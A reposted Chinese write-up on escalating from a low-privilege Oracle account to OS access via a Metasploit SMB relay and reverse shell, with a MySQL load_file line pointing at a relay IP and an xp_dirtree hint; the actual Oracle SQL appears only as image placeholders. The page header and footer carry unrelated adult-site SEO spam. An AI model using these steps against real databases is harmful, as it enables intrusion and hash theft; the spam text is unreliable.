a亚洲精品_精品国产91乱码一区二区三区_亚洲精品在线免费观看视频_欧美日韩亚洲国产综合_久久久久久久久久久成人_在线区

首頁 > 數據庫 > Oracle > 正文

Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利用

2024-08-29 13:56:45
字體:
來源:轉載
供稿:網友

這幾天看了篇叫"Penetration: from application down to OS (Oracle)"的文檔,感覺挺有意思的,文檔的 大概意思就是說,如果 ORACLE 服務是用 administrator 賬戶啟動的,你只要有一個具有 resource 和 connect 權限的數據庫賬戶,就能利用 metasploit 的 smbrelay 功能,本地搭建一個 SMB 欺騙服務器, 來得到系統的訪問權限。我本地測試了下,還真的成功了。:-)

具體的原理分析看原文吧,我這里把我的測試過程寫出來.

我的滲透環境用的是 ubuntu8.10+metasploit 3.3 dev,oracle 數據庫版本為 10.2.0.1.0,服務啟動權限為 administrator,數據庫賬戶用的是 dbsnmp 賬戶的默認權限.

1.先用 netstat 命令查看一下,本地的 139 端口有沒有占用,一般占用此端口的服務就是 Samba 了,要關掉。ubuntu 的關閉方法是 sudo /etc/init.d/samba stop<p>

Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利用

2.運行 metasploit,我選用的 PAYLOAD 是 shell_reverse_tcp,做好相應配置后,exploit.就能用 netstat 看到本地已經監聽了 139 和 8522 端口了.

Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利用

4.然后執行下面 3 條 SQL 語句

Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利用

Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利用mysql,如果服務也是 administrator 啟動的,用select load_file('////192.168.1.52/mk.txt')也是可以得到系統權限的.MSSQL 應該用 xp_dirtree 存儲過程 也是可以的,不過我沒有配置出來用 administrator 賬戶啟動 MSSQL 服務,希望知道的朋友指點下我。

這個技術可以用到內網 WEB 評估的時候,如果有注入,服務又是 administrator 啟動的,可以提權了。

兩個PDF下載,

作者:Mickey
(Oracle%20database).pdf

當執行完 create index 這句的時候,在看咱們本地的 metasploit,就已經得到 ORACLE 數據庫主機的系 統當前服務用戶的 half lm 哈希和 cmdshell 了。

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 日韩大片免费看 | 日韩成人三级 | 激情欧美日韩一区二区 | 日本不卡一区 | 亚洲毛片在线 | 羞羞在线观看视频免费观看hd | 日日骚| 在线看免费观看日本 | 六月色婷婷| 精品久久久久久久人人人人传媒 | 国产激情在线 | 亚洲一级免费看 | 天天插天天操天天干 | 狠狠综合久久av一区二区小说 | 欧美日韩免费 | 国产精品毛片 | 欧美日韩一二三区 | 日本三级在线视频 | 久久精品亚洲欧美日韩精品中文字幕 | 日本一区二区三区视频在线观看 | 国产精品国产三级国产aⅴ入口 | 日韩av电影免费 | 欧美精品久久久 | 日本另类αv欧美另类aⅴ | 中文字幕日韩一区 | 亚洲精品亚洲人成人网 | 99热影院 | 日韩人体在线 | 国产日韩欧美一区二区 | 91中文字幕 | 精品一区二区6 | 亚洲爽爽 | 免费在线日本 | 91精品一区二区三区久久久久久 | 亚洲一区二区三区在线播放 | 亚洲精选一区 | 日韩成人av在线 | 成人在线日韩 | 欧美日色| 又黄又爽的网站 | 97国产一区二区 |